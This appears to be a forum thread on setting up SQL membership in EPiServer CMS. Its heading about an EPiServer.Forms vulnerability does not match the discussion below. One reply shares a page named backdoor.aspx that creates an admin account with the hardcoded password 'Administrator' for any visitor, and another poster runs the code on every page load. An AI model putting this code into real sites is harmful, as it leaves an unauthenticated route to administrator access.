Vulnerability in EPiServer.Forms
When I created the latest project I got WindowsRoleProvider by default. I guess switching is not a problem but I can't find how to add that first user. I remember it's something along the lines of right clicking the project in Visual Studio but I can't seem to find it. Has this been moved from the 2010 version? I'm in 2013 now.
If you want to switch from Windows to Sql provider -> you need to change it in web.config. Find <membership> and <roleManager>. You most probably will have MultiplexProvider set by default. You need to configure it in order to set Sql providers in first place.
And as for adding the first user. If you are using MultiplexProvider you will be able to log in with your windows account and then create a sql user. After that you can do the switch as Valdis showed.
You can find that option under PROJECT / ASP.NET Configuration
Creating users and roles manually is boring :) So I created this small tool:
<%@ Page Language="C#" AutoEventWireup="true" %>
var adminRole = "WebAdmins";
var username = "Administrator";
var password = "Administrator";
var email = "email@example.com";
if (Membership.GetUser(username) == null)
var user = Membership.CreateUser(username, password, email);
user.IsApproved = true;
Roles.AddUserToRole(username, adminRole); %>
You can name this file backdoor.aspx and place it under wwwroot folder like this:
You don't have to include it in your solution.
It will create a user called Administrator, password Administrator, and assign it to WebAdmins group.
All you have to do next is to simply navigate to that file:
And it will create a user for you:
Hope this helps!
Edit: Image upload doesn't work, so I'm posting links.
Nice! Just remember to remove file from production server if accidently deployed :)
I've swaped the providers to the two SQL server providers and I pasted Dejans code into the page load of my masterpage. It still won't let me log in, though. I put breakpoints in the code and I can see that the user I created exists since it didn't try to create neither the group or user at new. What's the problem here?
By the way, brilliant way to do it, Dejan!
If I change the provider back to Multiplexing I can log in using my Windows Membership but not the accounts provided by SQL. When I go to "Search User/Group" in admin mode and press search I get a notification saying:
"Item has already been added. Key in dictionary: 'test' Key being added: 'test'"
I tried adding a three different accounts and test was one of them. Still, no user shows up in the search result. If I search for groups I see the WebAdmins group that was created in the code and when I look at the members of it I only get one line, a blank one.
How is this possible?
Does anything below need editing?
<add name="Administrators" type="EPiServer.Security.WindowsAdministratorsRole, EPiServer.Framework" />
<add name="Everyone" type="EPiServer.Security.EveryoneRole, EPiServer.Framework" />
<add name="Authenticated" type="EPiServer.Security.AuthenticatedRole, EPiServer.Framework" />
<add name="Anonymous" type="EPiServer.Security.AnonymousRole, EPiServer.Framework" />
<add name="CmsAdmins" type="EPiServer.Security.MappedRole, EPiServer.Framework" roles="WebAdmins, Administrators" mode="Any" />
<add name="CmsEditors" type="EPiServer.Security.MappedRole, EPiServer.Framework" roles="WebEditors" mode="Any" />
<add name="Creator" type="EPiServer.Security.CreatorRole, EPiServer" />
<add name="PackagingAdmins" type="EPiServer.Security.MappedRole, EPiServer.Framework" roles="WebAdmins, Administrators" mode="Any" />
Never mind. I forgot the row to add the user to the role.... :$
While we're on the subject; now that I've manage to switch to SqlMembershipProvider every page in edit mode says "You have not been assigned the user rights to make chhanges to this page". What else do I need to do to get this working? Creating a "webeditors" group was not enough.
Double check user access rights for the pages. CMS -> Admin -> Admin -> Access Rights
I had the group names mixed up. Thanks for pointing that out!